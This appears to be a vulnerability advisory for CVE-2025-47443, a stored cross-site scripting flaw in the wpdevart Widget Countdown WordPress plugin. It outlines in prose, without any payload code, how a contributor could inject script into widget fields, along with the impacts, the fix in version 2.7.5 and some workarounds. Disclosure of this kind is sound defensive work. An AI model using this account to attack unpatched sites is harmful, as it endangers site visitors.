CVE-2025-47443

Vulnerability

Overview

CVE-2025-47443 describes a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress plugin Widget Countdown, developed by wpdevart, affecting versions 2.7.4 and earlier. The root cause is improper neutralization of user-supplied input during web page generation ([1]). This allows an authenticated user with contributor-level privileges (or higher) to inject arbitrary JavaScript or HTML payloads into plugin output that persists in the database and executes when any visitor loads an affected page ([1]).

Attack

Vector

Exploitation requires the attacker to have a WordPress user account with at least the Contributor role. The attacker crafts a malicious input—such as a widget title, countdown label, or other user-editable field—containing script code. The plugin fails to sanitize or escape this input before rendering it. No direct user interaction from the victim is needed; simply browsing a page where the widget appears triggers the payload ([1]).

Impact

A successful attack enables the attacker to execute arbitrary JavaScript in the context of the victim’s browser session. This can lead to session hijacking, defacement, redirection to malicious sites, or injection of advertisements and phishing overlays. Because the XSS is stored, the payload loads automatically for all site visitors, making it suitable for mass-exploitation campaigns targeting thousands of WordPress sites ([1]).

Mitigation

Status

The vulnerability is fixed in version 2.7.5 of the plugin. Users are strongly advised to update immediately. For sites where immediate update is not possible, temporary workarounds include disabling the widget or applying a web application firewall rule to block known XSS patterns. Patchstack subscribers can enable auto-updates for vulnerable plugins ([1]).